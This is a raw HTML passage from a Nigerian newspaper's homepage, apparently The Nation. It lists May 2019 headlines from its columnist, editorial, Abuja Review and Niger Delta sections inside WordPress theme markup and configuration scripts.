class="vc_pageable-slide-wrapper vc_clearfix" data-vc-grid-content="true"><div class="vc_grid-item vc_clearfix vc_col-sm-12"><div class="vc_grid-item-mini vc_clearfix "><div class="vc_gitem-animated-block vc_gitem-animate vc_gitem-animate-goTop20" data-vc-animation="goTop20"><div class="vc_gitem-zone vc_gitem-zone-a vc_custom_1556090906941 vc-gitem-zone-height-mode-auto vc-gitem-zone-height-mode-auto-3-4 vc_gitem-is-link"> <a href="https://thenationonlineng.net/beyond-the-politics-of-insecurity/" title="Beyond the politics of insecurity" class="vc_gitem-link vc-zone-link"></a> <img src="https://thenationonlineng.net/wp-content/uploads/2018/09/Segun-Ayobolu.jpg?id=919544" class="vc_gitem-zone-img" alt="Buhari NPC"> <div class="vc_gitem-zone-mini"> <div class="vc_gitem_row vc_row vc_gitem-row-position-bottom"><div class="vc_col-sm-12 vc_gitem-col vc_gitem-col-align-"><h6 style="color: #ffffff;text-align: center" class="vc_custom_heading vc_custom_1537268419847">Segun Ayobolu</h6></div></div> </div> </div> <div class="vc_gitem-zone vc_gitem-zone-b vc-gitem-zone-height-mode-auto vc_gitem-is-link"> <a href="https://thenationonlineng.net/beyond-the-politics-of-insecurity/" title="Beyond the politics of insecurity" class="vc_gitem-link vc-zone-link"></a> <div class="vc_gitem-zone-mini"> <div class="vc_gitem_row vc_row vc_gitem-row-position-bottom"><div class="vc_col-sm-12 vc_gitem-col vc_gitem-col-align- vc_custom_1419254486087"><div class="vc_custom_heading vc_gitem-post-data vc_gitem-post-data-source-post_title"><h4 style="text-align: left">Beyond the politics of insecurity</h4></div><div class="vc_custom_heading vc_gitem-post-data vc_gitem-post-data-source-post_date"><div>May 10, 2019</div></div></div></div> </div> </div> </div> </div><div class="vc_clearfix"></div></div></div></div> </div> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-1/5"><div class="jeg_wrapper "><div class="wpb_wrapper"> <div class="vc_grid-container-wrapper vc_clearfix"> <div class="vc_grid-container vc_clearfix wpb_content_element vc_basic_grid" data-initial-loading-animation="none" data-vc-grid-settings="{&quot;page_id&quot;:915165,&quot;style&quot;:&quot;all&quot;,&quot;action&quot;:&quot;vc_get_vc_grid_data&quot;,&quot;shortcode_id&quot;:&quot;1557899413301-b5e1594a-44a3-8&quot;,&quot;tag&quot;:&quot;vc_basic_grid&quot;}" data-vc-request="https://thenationonlineng.net/wp-admin/admin-ajax.php" data-vc-post-id="915165" data-vc-public-nonce="785f3df2cc"> <style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1556090802282{background-image: url(https://thenationonlineng.net/wp-content/uploads/2019/01/PalladiumLogo.jpg?id=965549) !important;}.vc_custom_1547293225199{padding-top: 5px !important;padding-right: 5px !important;padding-bottom: 5px !important;padding-left: 5px !important;background-color: #dd3333 !important;}.vc_custom_1419254486087{background-color: #f2f2f2 !important;}</style><div class="vc_grid vc_row vc_pageable-wrapper vc_hook_hover" data-vc-pageable-content="true"><div class="vc_pageable-slide-wrapper vc_clearfix" data-vc-grid-content="true"><div class="vc_grid-item vc_clearfix vc_col-sm-12"><div class="vc_grid-item-mini vc_clearfix "><div class="vc_gitem-animated-block vc_gitem-animate vc_gitem-animate-goTop20" data-vc-animation="goTop20"><div class="vc_gitem-zone vc_gitem-zone-a vc_custom_1556090802282 vc-gitem-zone-height-mode-auto vc-gitem-zone-height-mode-auto-3-4 vc_gitem-is-link"> <a href="https://thenationonlineng.net/the-waspish-el-rufai/" title="The waspish el-Rufai" class="vc_gitem-link vc-zone-link"></a> <img src="https://thenationonlineng.net/wp-content/uploads/2019/01/PalladiumLogo.jpg?id=965549" class="vc_gitem-zone-img" alt="el-Rufai"> <div class="vc_gitem-zone-mini"> <div class="vc_gitem_row vc_row vc_gitem-row-position-bottom"><div class="vc_col-sm-12 vc_gitem-col vc_gitem-col-align-"><h6 style="color: #ffffff;text-align: center" class="vc_custom_heading vc_custom_1547293225199">Idowu Akinlotan</h6></div></div> </div> </div> <div class="vc_gitem-zone vc_gitem-zone-b vc-gitem-zone-height-mode-auto vc_gitem-is-link"> <a href="https://thenationonlineng.net/the-waspish-el-rufai/" title="The waspish el-Rufai" class="vc_gitem-link vc-zone-link"></a> <div class="vc_gitem-zone-mini"> <div class="vc_gitem_row vc_row vc_gitem-row-position-bottom"><div class="vc_col-sm-12 vc_gitem-col vc_gitem-col-align- vc_custom_1419254486087"><div class="vc_custom_heading vc_gitem-post-data vc_gitem-post-data-source-post_title"><h4 style="text-align: left">The waspish el-Rufai</h4></div><div class="vc_custom_heading vc_gitem-post-data vc_gitem-post-data-source-post_date"><div>May 12, 2019</div></div></div></div> </div> </div> </div> </div><div class="vc_clearfix"></div></div></div></div> </div> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-1/5"><div class="jeg_wrapper "><div class="wpb_wrapper"> <div class="vc_grid-container-wrapper vc_clearfix"> <div class="vc_grid-container vc_clearfix wpb_content_element vc_basic_grid" data-initial-loading-animation="none" data-vc-grid-settings="{&quot;page_id&quot;:915165,&quot;style&quot;:&quot;all&quot;,&quot;action&quot;:&quot;vc_get_vc_grid_data&quot;,&quot;shortcode_id&quot;:&quot;1557899413302-833aa9f3-5692-7&quot;,&quot;tag&quot;:&quot;vc_basic_grid&quot;}" data-vc-request="https://thenationonlineng.net/wp-admin/admin-ajax.php" data-vc-post-id="915165" data-vc-public-nonce="785f3df2cc"> <style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1556090836158{background-image: url(http://thenationonlineng.net/wp-content/uploads/2019/01/Tatalo-Logo.jpg?id=965548) !important;}.vc_custom_1547293065562{padding-top: 5px !important;padding-right: 5px !important;padding-bottom: 5px !important;padding-left: 5px !important;background-color: #dd3333 !important;}.vc_custom_1419254486087{background-color: #f2f2f2 !important;}</style><div class="vc_grid vc_row vc_pageable-wrapper vc_hook_hover" data-vc-pageable-content="true"><div class="vc_pageable-slide-wrapper vc_clearfix" data-vc-grid-content="true"><div class="vc_grid-item vc_clearfix vc_col-sm-12"><div class="vc_grid-item-mini vc_clearfix "><div class="vc_gitem-animated-block vc_gitem-animate vc_gitem-animate-goTop20" data-vc-animation="goTop20"><div class="vc_gitem-zone vc_gitem-zone-a vc_custom_1556090836158 vc-gitem-zone-height-mode-auto vc-gitem-zone-height-mode-auto-3-4 vc_gitem-is-link"> <a href="https://thenationonlineng.net/at-bay-in-abuja/" title="At Bay in Abuja" class="vc_gitem-link vc-zone-link"></a> <img src="https://thenationonlineng.net/wp-content/uploads/2019/01/Tatalo-Logo.jpg?id=965548" class="vc_gitem-zone-img" alt="killer-herdsmen"> <div class="vc_gitem-zone-mini"> <div class="vc_gitem_row vc_row vc_gitem-row-position-bottom"><div class="vc_col-sm-12 vc_gitem-col vc_gitem-col-align-"><h6 style="color: #ffffff;text-align: center" class="vc_custom_heading vc_custom_1547293065562">Tatalo Alamu</h6></div></div> </div> </div> <div class="vc_gitem-zone vc_gitem-zone-b vc-gitem-zone-height-mode-auto vc_gitem-is-link"> <a href="https://thenationonlineng.net/at-bay-in-abuja/" title="At Bay in Abuja" class="vc_gitem-link vc-zone-link"></a> <div class="vc_gitem-zone-mini"> <div class="vc_gitem_row vc_row vc_gitem-row-position-bottom"><div class="vc_col-sm-12 vc_gitem-col vc_gitem-col-align- vc_custom_1419254486087"><div class="vc_custom_heading vc_gitem-post-data vc_gitem-post-data-source-post_title"><h4 style="text-align: left">At Bay in Abuja</h4></div><div class="vc_custom_heading vc_gitem-post-data vc_gitem-post-data-source-post_date"><div>May 12, 2019</div></div></div></div> </div> </div> </div> </div><div class="vc_clearfix"></div></div></div></div> </div> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-1/5"><div class="jeg_wrapper "><div class="wpb_wrapper"> <div class="vc_grid-container-wrapper vc_clearfix"> <div class="vc_grid-container vc_clearfix wpb_content_element vc_basic_grid" data-initial-loading-animation="none" data-vc-grid-settings="{&quot;page_id&quot;:915165,&quot;style&quot;:&quot;all&quot;,&quot;action&quot;:&quot;vc_get_vc_grid_data&quot;,&quot;shortcode_id&quot;:&quot;1557899413303-edb78bb3-643c-4&quot;,&quot;tag&quot;:&quot;vc_basic_grid&quot;}" data-vc-request="https://thenationonlineng.net/wp-admin/admin-ajax.php" data-vc-post-id="915165" data-vc-public-nonce="785f3df2cc"> <style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1556090773977{background-image: url(http://thenationonlineng.net/wp-content/uploads/2019/04/Olatunji-Ololade.jpg?id=1014932) !important;}.vc_custom_1554280193222{padding-top: 5px !important;padding-right: 5px !important;padding-bottom: 5px !important;padding-left: 5px !important;background-color: #dd3333 !important;}.vc_custom_1419254486087{background-color: #f2f2f2 !important;}</style><div class="vc_grid vc_row vc_pageable-wrapper vc_hook_hover" data-vc-pageable-content="true"><div class="vc_pageable-slide-wrapper vc_clearfix" data-vc-grid-content="true"><div class="vc_grid-item vc_clearfix vc_col-sm-12"><div class="vc_grid-item-mini vc_clearfix "><div class="vc_gitem-animated-block vc_gitem-animate vc_gitem-animate-goTop20" data-vc-animation="goTop20"><div class="vc_gitem-zone vc_gitem-zone-a vc_custom_1556090773977 vc-gitem-zone-height-mode-auto vc-gitem-zone-height-mode-auto-3-4 vc_gitem-is-link"> <a href="https://thenationonlineng.net/nigerias-open-secret/" title="Nigeria’s open secret" class="vc_gitem-link vc-zone-link"></a> <img src="https://thenationonlineng.net/wp-content/uploads/2019/04/Olatunji-Ololade.jpg?id=1014932" class="vc_gitem-zone-img" alt="ethnic and religious in Nigeria"> <div class="vc_gitem-zone-mini"> <div class="vc_gitem_row vc_row vc_gitem-row-position-bottom"><div class="vc_col-sm-12 vc_gitem-col vc_gitem-col-align-"><h6 style="color: #ffffff;text-align: center" class="vc_custom_heading vc_custom_1554280193222">Olatunji Ololade</h6></div></div> </div> </div> <div class="vc_gitem-zone vc_gitem-zone-b vc-gitem-zone-height-mode-auto vc_gitem-is-link"> <a href="https://thenationonlineng.net/nigerias-open-secret/" title="Nigeria’s open secret" class="vc_gitem-link vc-zone-link"></a> <div class="vc_gitem-zone-mini"> <div class="vc_gitem_row vc_row vc_gitem-row-position-bottom"><div class="vc_col-sm-12 vc_gitem-col vc_gitem-col-align- vc_custom_1419254486087"><div class="vc_custom_heading vc_gitem-post-data vc_gitem-post-data-source-post_title"><h4 style="text-align: left">Nigeria’s open secret</h4></div><div class="vc_custom_heading vc_gitem-post-data vc_gitem-post-data-source-post_date"><div>May 15, 2019</div></div></div></div> </div> </div> </div> </div><div class="vc_clearfix"></div></div></div></div> </div> </div> </div></div></div></div></div></div></div></div><div class="row vc_row"><div class="jeg-vc-wrapper"><div class="wpb_column jeg_column vc_column_container vc_col-sm-3 vc_hidden-sm vc_hidden-xs jeg_main_content"><div class="jeg_wrapper wpb_wrapper"><div class="jeg_postblock_24 jeg_postblock jeg_module_hook jeg_pagination_disable jeg_col_1o3 jnews_module_915165_28_5cdd84ca32235 " data-unique="jnews_module_915165_28_5cdd84ca32235"> <div class="jeg_block_heading jeg_block_heading_6 jeg_subcat_right"> <h3 class="jeg_block_title"><a href="https://thenationonlineng.net/category/editorials/"><span>Editorial</span></a></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts"> <article class="jeg_post jeg_pl_md_box no_thumbnail post-1040715 post type-post status-publish format-standard hentry category-editorials tag-minor-misdeeds"> <div class="box_wrap"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/minor-misdeeds/"><div class="thumbnail-container animate-lazy no_thumbnail size-715 "></div></a> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/minor-misdeeds/">Minor misdeeds</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/minor-misdeeds/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </div> </article> <div class="jeg_postsmall jeg_load_more_flag"> <article class="jeg_post jeg_pl_xs_4 post-1040712 post type-post status-publish format-standard hentry category-editorials tag-chinese-convicts"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/chinese-convicts/">Chinese convicts</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040021 post type-post status-publish format-standard has-post-thumbnail hentry category-editorials tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/no-mean-family/">No mean family</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040023 post type-post status-publish format-standard hentry category-editorials tag-mass-wedding"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/a-season-of-mass-wedding/">A season of mass wedding</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1039248 post type-post status-publish format-standard has-post-thumbnail hentry category-editorials tag-callous tag-obscene"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/callous-obscene/">Callous, obscene!</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1039246 post type-post status-publish format-standard has-post-thumbnail hentry category-editorials tag-library-lamentation"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/library-lamentation/">Library lamentation</a> </h3> </div> </article> </div> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> </div> <script>var jnews_module_915165_28_5cdd84ca32235 = {"header_icon":"","first_title":"Editorial","second_title":"","url":"http:\/\/thenationonlineng.net\/category\/editorials\/","header_type":"heading_6","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"6","post_offset":"0","unique_content":"disable","include_post":"","exclude_post":"","include_category":"8","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","date_format":"custom","date_format_custom":"","pagination_mode":"disable","pagination_nextprev_showtext":"","pagination_number_post":4,"pagination_scroll_limit":0,"boxed":"","boxed_shadow":"","el_id":"","el_class":"","scheme":"","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":"","compatible_column_notice":"","paged":1,"column_class":"jeg_col_1o3","class":"jnews_block_24"};</script> </div></div></div><div class="wpb_column jeg_column vc_column_container vc_col-sm-3 vc_hidden-sm vc_hidden-xs jeg_main_content"><div class="jeg_wrapper wpb_wrapper"><div class="jeg_postblock_24 jeg_postblock jeg_module_hook jeg_pagination_disable jeg_col_1o3 jnews_module_915165_29_5cdd84ca38377 " data-unique="jnews_module_915165_29_5cdd84ca38377"> <div class="jeg_block_heading jeg_block_heading_6 jeg_subcat_right"> <h3 class="jeg_block_title"><a href="https://thenationonlineng.net/category/columnists/"><span>Columnists</span></a></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts"> <article class="jeg_post jeg_pl_md_box no_thumbnail post-1038744 post type-post status-publish format-standard hentry category-femi-macaulay tag-ajimobi tag-tech-u"> <div class="box_wrap"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/ajimobi-and-tech-u/"><div class="thumbnail-container animate-lazy no_thumbnail size-715 "></div></a> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/ajimobi-and-tech-u/">Ajimobi and Tech-U</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/ajimobi-and-tech-u/"><i class="fa fa-clock-o"></i> May 13, 2019</a></div></div> </div> </div> </article> <div class="jeg_postsmall jeg_load_more_flag"> <article class="jeg_post jeg_pl_xs_4 post-1037821 post type-post status-publish format-standard has-post-thumbnail hentry category-under-tow-saturday tag-miyetti-allah tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/garba-shehu-on-afenifere-ohanaeze-and-miyetti-allah/">Garba Shehu on Afenifere, Ohanaeze and Miyetti Allah</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1035231 post type-post status-publish format-standard has-post-thumbnail hentry category-gabriel-amalu tag-milliken-hill-road tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/exclusion-of-majority/">Exclusion of majority</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1034652 post type-post status-publish format-standard hentry category-femi-macaulay tag-sexuality"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/the-trouble-with-sexuality/">The trouble with sexuality</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1033962 post type-post status-publish format-standard hentry category-oyinkan-medubi tag-may-day"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/may-day-2/">May Day! (2)</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1033847 post type-post status-publish format-standard has-post-thumbnail hentry category-under-tow-saturday tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/is-the-genie-of-lawlessness-finally-out-of-the-bottle/">Is the genie of lawlessness finally out of the bottle?</a> </h3> </div> </article> </div> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> </div> <script>var jnews_module_915165_29_5cdd84ca38377 = {"header_icon":"","first_title":"Columnists","second_title":"","url":"http:\/\/thenationonlineng.net\/category\/columnists\/","header_type":"heading_6","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"6","post_offset":"0","unique_content":"disable","include_post":"","exclude_post":"","include_category":"4","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","date_format":"custom","date_format_custom":"","pagination_mode":"disable","pagination_nextprev_showtext":"","pagination_number_post":4,"pagination_scroll_limit":0,"boxed":"","boxed_shadow":"","el_id":"","el_class":"","scheme":"","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":"","compatible_column_notice":"","paged":1,"column_class":"jeg_col_1o3","class":"jnews_block_24"};</script> </div></div></div><div class="wpb_column jeg_column vc_column_container vc_col-sm-3 vc_hidden-sm vc_hidden-xs jeg_main_content"><div class="jeg_wrapper wpb_wrapper"><div class="jeg_postblock_24 jeg_postblock jeg_module_hook jeg_pagination_disable jeg_col_1o3 jnews_module_915165_30_5cdd84ca40ce5 " data-unique="jnews_module_915165_30_5cdd84ca40ce5"> <div class="jeg_block_heading jeg_block_heading_6 jeg_subcat_right"> <h3 class="jeg_block_title"><a href="https://thenationonlineng.net/category/northern-report/abuja-review/"><span>Abuja Review</span></a></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts"> <article class="jeg_post jeg_pl_md_box post-1031293 post type-post status-publish format-standard has-post-thumbnail hentry category-abuja-review tag-luka-panya-baba tag-malam-muhammad-bello tag-nassarawa-state tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="box_wrap"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/minister-to-monarchs-work-with-government/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="Minister to monarchs: work with government" data-src="https://thenationonlineng.net/wp-content/uploads/2019/04/frsc-3-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/04/frsc-3-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/04/frsc-3-120x86.jpg 120w" data-expand="700" /></div></a> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/minister-to-monarchs-work-with-government/">Minister to monarchs: work with government</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/minister-to-monarchs-work-with-government/"><i class="fa fa-clock-o"></i> April 30, 2019</a></div></div> </div> </div> </article> <div class="jeg_postsmall jeg_load_more_flag"> <article class="jeg_post jeg_pl_xs_4 post-1031292 post type-post status-publish format-standard has-post-thumbnail hentry category-abuja-review tag-dr-ibrahim-alhaji-liman tag-estate-lugbe tag-federal-fire-service tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/hoodlums-attack-fire-service-men/">Hoodlums attack Fire Service men</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1031284 post type-post status-publish format-standard has-post-thumbnail hentry category-abuja-review tag-mrs-bunmi-popoola-mordi tag-nigerian-news tag-nigerian-newspaper tag-nnpc tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/total-nnpc-fight-malaria-in-fct/">Total, NNPC fight malaria in FCT</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1031283 post type-post status-publish format-standard has-post-thumbnail hentry category-abuja-review tag-federal-capital-territory-administration tag-hajarat-titilayo-alayande tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/uniform-youth-groupsll-curb-crime/">‘Uniform youth groups’ll curb crime’</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1027283 post type-post status-publish format-standard has-post-thumbnail hentry category-abuja-review tag-abuja tag-gishiri tag-maitama tag-nigerian-news tag-the-city-club-abuja tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/easter-relief-for-orphans-in-need/">Easter relief for orphans in need</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1027282 post type-post status-publish format-standard has-post-thumbnail hentry category-abuja-review tag-engr-umar-gambo-jibrin tag-federal-capital-development-authority"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/fcda-well-deliver-world-class-buildings/">FCDA: we’ll deliver world-class buildings</a> </h3> </div> </article> </div> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> </div> <script>var jnews_module_915165_30_5cdd84ca40ce5 = {"header_icon":"","first_title":"Abuja Review","second_title":"","url":"http:\/\/thenationonlineng.net\/category\/northern-report\/abuja-review\/","header_type":"heading_6","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"6","post_offset":"0","unique_content":"disable","include_post":"","exclude_post":"","include_category":"133","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","date_format":"custom","date_format_custom":"","pagination_mode":"disable","pagination_nextprev_showtext":"","pagination_number_post":4,"pagination_scroll_limit":0,"boxed":"","boxed_shadow":"","el_id":"","el_class":"","scheme":"","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":"","compatible_column_notice":"","paged":1,"column_class":"jeg_col_1o3","class":"jnews_block_24"};</script> </div></div></div><div class="wpb_column jeg_column vc_column_container vc_col-sm-3 vc_hidden-sm vc_hidden-xs jeg_main_content"><div class="jeg_wrapper wpb_wrapper"><div class="jeg_postblock_24 jeg_postblock jeg_module_hook jeg_pagination_disable jeg_col_1o3 jnews_module_915165_31_5cdd84ca451a0 " data-unique="jnews_module_915165_31_5cdd84ca451a0"> <div class="jeg_block_heading jeg_block_heading_6 jeg_subcat_right"> <h3 class="jeg_block_title"><a href="https://thenationonlineng.net/category/niger-delta-3/"><span>Niger Delta</span></a></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts"> <article class="jeg_post jeg_pl_md_box post-1037054 post type-post status-publish format-standard has-post-thumbnail hentry category-niger-delta-3 tag-niger-delta tag-nigerian-news tag-nigerian-newspaper tag-pind tag-the-nation-newspaper"> <div class="box_wrap"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/pind-moves-to-save-niger-delta-with-technology/"><div class="thumbnail-container animate-lazy size-715 "><img width="250" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="PIND" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/Biosand-filter-250x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/Biosand-filter.jpg 250w, https://thenationonlineng.net/wp-content/uploads/2019/05/Biosand-filter-150x150.jpg 150w, https://thenationonlineng.net/wp-content/uploads/2019/05/Biosand-filter-170x170.jpg 170w, https://thenationonlineng.net/wp-content/uploads/2019/05/Biosand-filter-75x75.jpg 75w" data-expand="700" /></div></a> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/pind-moves-to-save-niger-delta-with-technology/">PIND moves to save Niger Delta with technology</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/pind-moves-to-save-niger-delta-with-technology/"><i class="fa fa-clock-o"></i> May 10, 2019</a></div></div> </div> </div> </article> <div class="jeg_postsmall jeg_load_more_flag"> <article class="jeg_post jeg_pl_xs_4 post-1037053 post type-post status-publish format-standard has-post-thumbnail hentry category-niger-delta-3 tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/wikes-olive-branch-to-opposition-commendable/">‘Wike’s olive branch to opposition commendable’</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1037052 post type-post status-publish format-standard has-post-thumbnail hentry category-niger-delta-3 tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/day-uniport-hosted-journalism-educators/">Day UNIPORT hosted journalism educators</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1037051 post type-post status-publish format-standard has-post-thumbnail hentry category-niger-delta-3 tag-benin-city tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/day-police-desecrated-benin-tradition/">Day Police desecrated Benin tradition</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1037050 post type-post status-publish format-standard has-post-thumbnail hentry category-niger-delta-3 category-politics tag-bayelsa tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/bayelsa-after-dickson-who-picks-up-the-gauntlet/">Bayelsa after Dickson: who picks up the gauntlet?</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1033109 post type-post status-publish format-standard has-post-thumbnail hentry category-niger-delta-3 tag-bayelsa-state tag-nigerian-news tag-nigerian-newspaper tag-non-governmental-organisation tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/teenage-pregnancy-tackling-social-malaise-through-skills-acquisition/">Teenage pregnancy: Tackling social malaise through skills acquisition</a> </h3> </div> </article> </div> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> </div> <script>var jnews_module_915165_31_5cdd84ca451a0 = {"header_icon":"","first_title":"Niger 